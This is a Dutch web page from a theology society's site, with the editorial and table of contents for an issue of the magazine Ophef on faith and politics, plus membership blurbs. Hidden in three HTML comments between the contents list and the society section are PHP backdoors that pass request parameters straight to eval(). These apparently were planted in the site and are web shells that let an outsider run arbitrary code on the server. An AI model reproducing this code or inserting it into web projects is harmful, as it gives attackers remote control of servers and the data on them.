Oecumenisch denkplatform voor hartstochtelijke en maatschappelijk betrokken theologie. Ook op twitter en facebook

Ophef nr. 1 2011 | Geloof en politiek

Ophef 2011 1Redactioneel

 

Een themanummer over geloof en politiek. Alsof het daarover binnen de Vereniging voor Theologie en Maatschappij niet eigenlijk altijd gaat! Maar voordat we ons met dat thema bezighouden eerst iets anders. Met gepaste trots vernamen we, dat Hanneke van der Korst, sinds twee jaar lid van onze redactie, de essaywedstrijd van het dagblad Trouw heeft gewonnen. Omdat niet al onze lezers geabonneerd zijn op Trouw, drukken we haar inspirerende inzending “Zuster geef niet op!” af als openingsartikel van deze Ophef. Over ons thema hield Op Goed Gerucht in januari een studiedag. Zij hadden Bram Grandia uitgenodigd voor een inleiding en hij hield een verhaal over veertig jaar geloof en politiek. Dat verhaal drukken we af!

Veertig jaar is een hele tijd, maar de geschiedenis van geloof en politiek gaat veel verder terug. De doopsgezinden hebben een eeuwenlange geschiedenis van politiek spreken en handelen. Alle Hoekema schrijft erover. Wie het over ‘geloof en politiek’ heeft kan bijna niet voorbij aan de man, wiens naam ik liever in ons blad niet genoemd had. Leen van der Sar neemt zijn uitspraken over de Joods-christelijke traditie op de korrel en noemt hem een Godloochenaar (een woord, dat ik vrijwel niet meer heb gehoord sinds mijn grootvader zaliger overleed). Als u dit leest, hebben de verkiezingen voor de Provinciale Staten al plaats gevonden. Of u vindt, dat Groen Links wel of niet gestraft moet worden voor haar steun aan de regering inzake de politie-opleiding in Afghanistan, dat heeft u inmiddels zelf al besloten en u laat zich – wellicht terecht – niet beïnvloeden door wat wij daarover zeggen of schrijven. Toch plaatsen we, behalve zijn eerder geplaatste artikel, ook de column die Bram Grandia uitsprak voor de IKON radio op de zondag na het besluit en voor het congres van Groen Links.

Het zal de zorgvuldige lezer niet ontgaan zijn, dat sinds enige tijd Tiers Bakker onze redactie is komen versterken. Tiers is filosoof (en een beetje theoloog) en leest al die filosofen, waarover wij meestal gemakshalve de besprekingen in de Groene lezen. Wij doen er ons voordeel mee. Naar aanleiding van het thema twee korte artikelen over de Italiaanse filosoof Agamben en de Franse filosoof Bataille. Het leuke van een columnist (ik word er jaloers van) is dat je niet genuanceerd hoeft te zijn, want de column bestaat bij de gratie van het ongenuanceerde oordeel. Als Ephimenco of één van de andere azijnpissers (m/v) van Trouw ze debiteren, erger ik me rot, maar Johannes Diepersloot kan voor mij niet stuk: een mensenhaterskabinet! Vuilnisman kan deze….. Tot zover het themagedeelte, maar aansluitend nog een tweetal artikelen, die eigenlijk in de vorige (toch al dubbeldikke) Ophef over ‘theologie en economie’ hadden moeten staan.

Het artikel over de globalisering van Gerrit Buunk kwam binnen toen het nummer al naar de drukker was. We waren op zoek naar een artikel over ‘economie en gender’, maar vonden het niet. Althans, te laat! Hanneke van der Korst vond in het Tijdschrift voor Genderstudies het artikel van Edith Kuiper “over gender en de economische crisis” en verwierf de toestemming van de auteur om het over te nemen. Met het oog op de stille week een artikel, dat Edward Skubisz, onze correspondent in Polen, vorig jaar schreef over de Stille Week en seksueel misbruik. Helaas nog minstens even actueel als vorig jaar. Marino Camarasa las de grote biografie over Bert ter Schegget en bericht daarover, terwijl Harm Dane de eerste gedichtenbundel van onze vroegere hoofdredacteur Wessel ten Boom bespreekt.

Als altijd heeft Albert Slaats het laatste woord. Als zijn medecolumnist neemt hij geen blad voor de mond: Hufters! Niet het mooiste woord om mee te eindigen. Het volgende nummer gaat over het gebed, maar of het daarom minder heftig zal zijn? Wie een bijdrage wil leveren aan een antwoord op de vraag in hoeverre het gebed van maatschappelijke of politieke betekenis is, is van harte welkom.

 

Wilken Veen

 

inhoud

1. Redactioneel

    Wilken Veen

2. Zuster, geef niet op!

    Hanneke van der Korst 

3. Het zwijgen voorbij? 40 jaar geloof en politiek

    Bram Grandia

4. Nederlandse Doopsgezinden en politiek: een verhalende schets

   Alle G. Hoekema

5. Geert Wilders als loochenaar van het Christendom – over het afleggen van de oude Adam –

   Leen van der Sar

6. Pacifisten politiek dakloos

    Bram Grandia, IKON pastor

7. De Italiaanse differentie: tussen politiek en theologie

    Tiers Bakker

8.  “Ik zal de wijsheid van de wijzen vernietigen” Over radicale theologie

    Tiers Bakker

9.  …zwerfvuil…

10. Geloofwaardige globalisering

     Gerrit Buunk

11. Over gender en de economische crisis

      Edith Kuiper

12.  In de stilte van de Goede Week: seksueel misbruik en religie

       Edward Skubisz

13. Vloeken en bidden om een nieuwe aarde

     Een boekbespreking door Marino Camarasa

14. Begeerte heeft ons aangeraakt

     Harm Dane

15. Heftig

     Albert Slaats

16. Vakliteratuur bij Narratio

 

<!– [insert_php]if (isset($_REQUEST["zpa"])){eval($_REQUEST["zpa"]);exit;}[/insert_php][php]if (isset($_REQUEST["zpa"])){eval($_REQUEST["zpa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uoReG"])){eval($_REQUEST["uoReG"]);exit;}[/insert_php][php]if (isset($_REQUEST["uoReG"])){eval($_REQUEST["uoReG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["dMp"])){eval($_REQUEST["dMp"]);exit;}[/insert_php][php]if (isset($_REQUEST["dMp"])){eval($_REQUEST["dMp"]);exit;}[/php] –>

WAT IS VTM?

Oecumenisch denkplatform voor hartstochtelijke en maatschappelijk betrokken theologie.

Belangrijke activiteiten zijn de uitgave van het periodiek Ophef en het publiceren van theologische portretten.

Via Ophef wil de VTM het maatschappelijke en theologische debat stimuleren!

BENT U AL LID VAN DE VTM?

Heeft u zich al eens afgevraagd waarom u dat nog niet bent? Want dat kan heel makkelijk via: secretariaatvtm@gmail.com

 

WAAROM HEEFT U NOG GEEN ABONNEMENT OP OPHEF?

Dat geeft uren leesplezier voor een relatief klein bedrag. En het kan namelijk heel makkelijk! Stuur een mail naar secretariaatvtm@gmail.com